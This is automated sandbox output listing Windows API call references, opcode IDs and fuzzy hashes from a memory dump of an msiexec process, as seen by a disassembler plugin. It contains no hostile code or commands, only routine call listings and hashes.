                                                                                                                                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                                                                                                                                      • Opcode Fuzzy Hash: c9e98542c376da042cc7e9fe0c2757e169e3ab3aa14d13962e5d64e4fd764852
                                                                                                                                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3150196962-0
                                                                                                                                                      • Opcode ID: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                                                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                      • Opcode Fuzzy Hash: 86234f6dcfe5183eb12d2d600ddfcc7b691cb690ca4801b5099eddac0042a321
                                                                                                                                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                      APIs
                                                                                                                                                      Strings
                                                                                                                                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: malloc
                                                                                                                                                      • String ID: failed to allocate %u bytes of memory
                                                                                                                                                      • API String ID: 2803490479-1168259600
                                                                                                                                                      • Opcode ID: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                      • Instruction ID: 101c51dc2fc609bd9d1e0073b1fda66f00508c6688545faad3e4fa21ce9dc4bd
                                                                                                                                                      • Opcode Fuzzy Hash: 5362f241c04528c046f9391a2b70be4ceaf2b9bead8481f91e416c113c2d710c
                                                                                                                                                      • Instruction Fuzzy Hash: 11E0DFB7B02A12A3C200561AED01AC667959FC122572B013BF92CD3681E638D89687A9
                                                                                                                                                      APIs
                                                                                                                                                      • memset.MSVCRT ref: 0041BDDF
                                                                                                                                                      • memcmp.MSVCRT(00001388,?,00000010,?,00000065,00000065,?,?,?,?,?,0041F1B4,?,00000065,004381DF,00000065), ref: 0041BDF1
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: memcmpmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1065087418-0
                                                                                                                                                      • Opcode ID: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                      • Instruction ID: cf105cae5e27f97c9cd1c3f46a8d5e16e2707a712041142e317bfb3d1f631299
                                                                                                                                                      • Opcode Fuzzy Hash: c380604b195766abe84e73715a049d0373e74049267bc02831dab12048305386
                                                                                                                                                      • Instruction Fuzzy Hash: 2A615B71A01349EBDB14EFA495815EEB7B4EB04308F1440AFE609D3241E738AED4DB99
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 0040ECF9
                                                                                                                                                        • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                      • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                      • CloseHandle.KERNELBASE(?), ref: 00410654
                                                                                                                                                        • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                        • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                        • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                        • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1381354015-0
                                                                                                                                                      • Opcode ID: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                      • Instruction ID: c777e68e994987bb064ab7fb99de871126f79ef1b866bcb434911d427814d160
                                                                                                                                                      • Opcode Fuzzy Hash: 331637186d7fda146188de6d28ea3842bad20729486783243114fed48956b45e
                                                                                                                                                      • Instruction Fuzzy Hash: BE417231A00204EFCB25AF65C885A9E77B6EF84711F20446FF446A7291C7B99EC0DE59
                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: free
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1294909896-0
                                                                                                                                                      • Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                      • Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
                                                                                                                                                      • Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
                                                                                                                                                      • Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                        • Part of subcall function 0040A02C: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                        • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                        • Part of subcall function 0040A02C: CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                      • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2154303073-0
                                                                                                                                                      • Opcode ID: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                      • Instruction ID: d476be81a684c5cf971044fbd14bb177a9e73989d843208b34704cc982626f94
                                                                                                                                                      • Opcode Fuzzy Hash: 56a49437465c6dd79f718b685576690655c489aaf9a54b49d185ed9555da5ee2
                                                                                                                                                      • Instruction Fuzzy Hash: 11111CB6D00218ABCB11EFA5D9415DEBBB9EF44315F20407BE841F7281DA389F45CB95
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 004135E0: FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Library$Load$AddressDirectoryFreeProcSystemmemsetwcscatwcscpy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3150196962-0
                                                                                                                                                      • Opcode ID: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                                                                      • Instruction ID: 35a9ad0fe6b4507ee66bae46934dcfd2e139bf0842d10804986ce3ee8b034d80
                                                                                                                                                      • Opcode Fuzzy Hash: e8610485fa55ef6227a98938b97cf07d3e826c2ed4ae4196069be0aa637d7783
                                                                                                                                                      • Instruction Fuzzy Hash: BBF0A4311447126AE6306B7AAC02BE762849F00725F10862EB425D55D1EFA8D5C046AC
                                                                                                                                                      APIs
                                                                                                                                                      • SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                                                                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: File$PointerRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3154509469-0
                                                                                                                                                      • Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                      • Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
                                                                                                                                                      • Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
                                                                                                                                                      • Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
                                                                                                                                                      APIs
                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                        • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                        • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                        • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 4232544981-0
                                                                                                                                                      • Opcode ID: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                      • Instruction ID: 104e910b762de94586eb11e4c264cf061db1895f8dce3fe8c281d71359574313
                                                                                                                                                      • Opcode Fuzzy Hash: 58bd15f6e23597088465cc0f12acd7a0529fd6d647dc9a4ec136155e63c93ad6
                                                                                                                                                      • Instruction Fuzzy Hash: 8EE09232000209ABDF125F91EC01AA93B66FF54315F548469F95C05520D33295B0AB59
                                                                                                                                                      APIs
                                                                                                                                                      • FreeLibrary.KERNELBASE(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                      • Opcode ID: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                      • Instruction ID: 9043d1e372537a54137ae43dcd20834ee918eeaa55a47e8e1dedab4d47514996
                                                                                                                                                      • Opcode Fuzzy Hash: 8c39ef9eaf727128d218f1dddc73c1f621731b9859e7ea9690b0e693fd97a8de
                                                                                                                                                      • Instruction Fuzzy Hash: E2E0F6B5900B018FD3708F1BE944406FBF8BFE56113108A1FD4AAC2A24D7B4A1898F54
                                                                                                                                                      APIs
                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                        • Part of subcall function 00413F4F: GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                      • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AddressProc$FileModuleName
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3859505661-0
                                                                                                                                                      • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                      • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                                                                                      • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                                                                                      • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                                                                                      APIs
                                                                                                                                                      • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileRead
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2738559852-0
                                                                                                                                                      • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                      • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                                                                                      • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                                                                                      • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                                                                                      APIs
                                                                                                                                                      • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FileWrite
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3934441357-0
                                                                                                                                                      • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                      • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                                                                                      • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                                                                                      • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                                                                                      APIs
                                                                                                                                                      • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                      • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                      • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                                                                                      • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                                                                                      • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                      • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                      • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                                                                                      • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                                                                                      • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                                                                                      APIs
                                                                                                                                                      • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                      • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                      • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                                                                                      • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                                                                                      • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                                                                                      APIs
                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ??3@
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 613200358-0
                                                                                                                                                      • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                      • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                                                                                      • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                                                                                      • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                                                                                      APIs
                                                                                                                                                      • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                      • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                      • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                                                                                      • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                                                                                      • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                                                                                      APIs
                                                                                                                                                      • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: EnumNamesResource
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3334572018-0
                                                                                                                                                      • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                      • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                                                                                      • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                                                                                      • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                                                                                      APIs
                                                                                                                                                      • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                      • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                      • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                                                                                      • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                                                                                      • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                                                                                      APIs
                                                                                                                                                      • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: CloseFind
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1863332320-0
                                                                                                                                                      • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                      • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                                                                                      • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                                                                                      • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                                                                                      APIs
                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 0000000D.00000002.2427620817.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_13_2_400000_msiexec.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                      • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                      • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                                                                                      • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                                                                                      • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                                                                                      Memory Dump Source
